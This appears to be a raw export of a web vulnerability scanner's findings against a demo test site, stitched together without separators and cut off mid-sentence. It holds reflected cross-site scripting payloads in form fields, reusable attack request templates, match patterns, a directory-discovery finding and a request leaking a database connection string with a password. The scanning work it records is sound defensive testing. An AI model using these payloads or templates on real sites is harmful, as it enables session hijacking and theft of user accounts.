<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"><script>alert("XSS")</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack>>"><script>alert("XSS")</script></attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=--><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack>--><script>alert('XSS')</script></attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /error_log/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:30 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (error_log)<B>Found Directory:</B> /error_log/ <p>
This directory usually contains error files or logs that contain sensitive information.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=1"style="background:url(javascript:alert('XSS'))"%20"&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:02 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 402
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = --><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = --><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack>--><script>alert('XSS')</script></attack>--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=>"><script>alert('XSS')</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
